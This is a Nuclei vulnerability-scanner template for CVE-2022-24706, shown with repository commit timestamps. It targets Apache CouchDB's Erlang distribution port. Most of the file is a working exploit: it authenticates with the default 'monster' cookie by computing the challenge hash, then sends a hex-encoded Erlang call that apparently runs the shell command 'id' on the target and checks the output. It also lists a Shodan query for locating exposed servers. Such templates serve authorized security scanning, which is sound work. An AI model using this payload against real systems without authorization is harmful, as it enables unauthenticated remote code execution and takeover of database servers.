nuclei-templates/network/cves/2022/CVE-2022-24706.yaml

49 lines
1.5 KiB
YAML
Raw Normal View History

2023-04-24 20:49:06 +00:00
id: CVE-2022-24706
2023-04-16 16:32:56 +00:00
info:
2023-04-24 20:49:06 +00:00
name: CouchDB Erlang Distribution - Remote Command Execution
author: Mzack9999,pussycat0x
2023-04-16 16:32:56 +00:00
severity: critical
2023-04-24 20:49:06 +00:00
description: |
In Apache CouchDB prior to 3.2.2, an attacker can access an improperly secured default installation without authenticating and gain admin privileges.
reference:
- https://www.exploit-db.com/exploits/50914
2023-06-06 06:42:39 +00:00
- https://github.com/sadshade/CVE-2022-24706-CouchDB-Exploit/blob/main/CVE-2022-24706-Exploit.py
- https://nvd.nist.gov/vuln/detail/CVE-2022-24706
2023-04-24 20:49:06 +00:00
metadata:
2023-06-06 06:42:39 +00:00
verified: "true"
2023-04-24 20:49:06 +00:00
shodan-query: product:"CouchDB"
2023-06-06 06:42:39 +00:00
tags: cve,cve2022,network,couch,rce
2023-04-16 16:32:56 +00:00
variables:
2023-06-06 07:07:03 +00:00
name_msg: "00156e00050007499c4141414141414041414141414141"
2023-04-16 16:32:56 +00:00
challenge_reply: "00157201020304"
cookie: "monster"
cmd: "0000006670836804610667770e41414141414140414141414141410000000300000000007700770372657883680267770e41414141414140414141414141410000000300000000006805770463616c6c77026f737703636d646c000000016b000269646a770475736572"
2023-06-06 07:17:45 +00:00
tcp:
2023-04-16 16:32:56 +00:00
- inputs:
# auth
- data: "{{name_msg}}"
type: hex
read: 1024
- read: 1024
name: challenge
- data: "{{challenge_reply+md5(cookie + to_string(unpack('>I',substr(challenge, 9, 13))))}}"
type: hex
# rce
- data: "{{cmd}}"
type: hex
read: 1024
host:
- "{{Hostname}}:9100"
2023-06-06 07:07:03 +00:00
- "{{Host}}:9100"
2023-04-16 16:32:56 +00:00
matchers:
- type: word
part: raw
words:
- "uid"
- "gid"
- "groups"
2023-04-24 20:49:06 +00:00
condition: and